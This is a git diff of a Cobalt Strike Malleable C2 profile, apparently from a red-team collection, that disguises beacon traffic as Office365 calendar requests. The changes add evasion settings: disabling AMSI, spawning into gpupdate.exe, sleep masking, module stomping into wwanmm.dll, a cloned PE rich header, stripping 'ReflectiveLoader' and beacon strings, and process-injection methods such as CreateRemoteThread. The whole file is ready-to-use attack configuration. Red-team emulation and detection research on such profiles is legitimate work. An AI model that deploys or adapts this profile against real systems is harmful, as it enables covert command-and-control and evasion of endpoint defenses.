diff --git a/normal/office365_calendar.profile b/normal/office365_calendar.profile
index b7d7aa7..043c6f4 100644
--- a/normal/office365_calendar.profile
+++ b/normal/office365_calendar.profile
@@ -1,25 +1,28 @@
 #office365 calendar view
 #office365 www.office.com redirects to outlook.live.com
-#info from requests 'GET /owa/?path=/calendar' and 'GET /owa/?wa=wsignin1.0&realm=outlook.com'
-#ran into size issues so cut it back to still make it look believable.
 #xx0hcd
 
-https-certificate {
-	set CN 		"outlook.live.com";
-	set C		"US";
-	set O		"Microsoft Corporation";
-	set L		"Redmond";
-	set OU		"Microsoft IT";
-	set ST		"Washington";
-	set validity	"365";
-}
-
 set sleeptime "30000";
 set jitter    "20";
 set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)";
 set dns_idle "8.8.8.8";
 set maxdns    "235";
 
+#custom cert
+#https-certificate {
+#    set keystore "your_store_file.store";
+#    set password "your_store_pass";
+#}
+
+http-config {
+#    set headers "Server, Content-Type, Cache-Control, Connection";
+#    header "Content-Type" "text/html;charset=UTF-8";
+#    header "Connection" "close";
+#    header "Cache-Control" "max-age=2";
+#    header "Server" "nginx";
+    #set "true" if teamserver is behind redirector
+    set trust_x_forwarded_for "false";
+}
 
 http-get {
 
@@ -27,7 +30,7 @@ http-get {
     
     client {
 
-	header "Host" "outlook.live.com";
+#	header "Host" "outlook.live.com";
 	header "Accept" "*/*";
 	header "Cookie" "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42=ZG0yMzA2KjEs";
         
@@ -76,7 +79,7 @@ http-post {
 
     client {
 
-	header "Host" "outlook.live.com";
+#	header "Host" "outlook.live.com";
 	header "Accept" "*/*";     
         
         output {
@@ -130,18 +133,98 @@ http-post {
 }
 
 http-stager {
+
+    set uri_x86 "/rpc";
+    set uri_x64 "/Rpc";
+
+    client {
+#        header "Host" "outlook.live.com";
+	header "Accept" "*/*";
+    }
+
     server {
-        header "Server" "Microsoft-IIS/10.0";
-        header "Content-Type" "text/html; charset=utf-8";
-        header "Connection" "close";
-    
+#headers are defined in the http-config block above, or you can set them manually here.
+        #header "Server" "nginx";    
+
     }
 
 
 }
 
-stage {
-	#random compile time
-	set compile_time "06 Aug 2016 09:48:38";
-	set userwx "false";
+###Malleable PE Options###
+
+post-ex {
+
+    set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
+    set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
+
+    set obfuscate "true";
+
+    set smartinject "true";
+
+    set amsi_disable "true";
+
 }
+
+#use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
+#don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
+stage {
+    set checksum       "0";
+    set compile_time   "25 Oct 2016 01:57:23";
+    set entry_point    "170000";
+    #set image_size_x86 "6586368";
+    #set image_size_x64 "6586368";
+    #set name	   "WWanMM.dll";
+    set userwx 	   "false";
+    set cleanup	   "true";
+    set sleep_mask	   "true";
+    set stomppe	   "true";
+    set obfuscate	   "true";
+    set rich_header    "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+    
+    #obfuscate beacon before sleep.
+    set sleep_mask "true";
+
+#module stomp. Make sure the dll you use is bigger than your payload and test it with post exploit options to make sure everything is working.
+
+    set module_x86 "wwanmm.dll";
+    set module_x64 "wwanmm.dll";
+
+    transform-x86 {
+        prepend "\x90\x90\x90";
+        strrep "ReflectiveLoader" "";
+        strrep "beacon.dll" "";
+        }
+
+    transform-x64 {
+        prepend "\x90\x90\x90";
+        strrep "ReflectiveLoader" "";
+        strrep "beacon.x64.dll" "";
+        }
+}
+
+process-inject {
+
+    set allocator "NtMapViewOfSection";		
+
+    set min_alloc "16700";
+
+    set userwx "false";  
+    
+    set startrwx "true";
+        
+    transform-x86 {
+        prepend "\x90\x90\x90";
+    }
+    transform-x64 {
+        prepend "\x90\x90\x90";
+    }
+
+    execute {
+        CreateThread "ntdll!RtlUserThreadStart";
+        CreateThread;
+        NtQueueApcThread;
+        CreateRemoteThread;
+        RtlCreateUserThread;
+    }
+}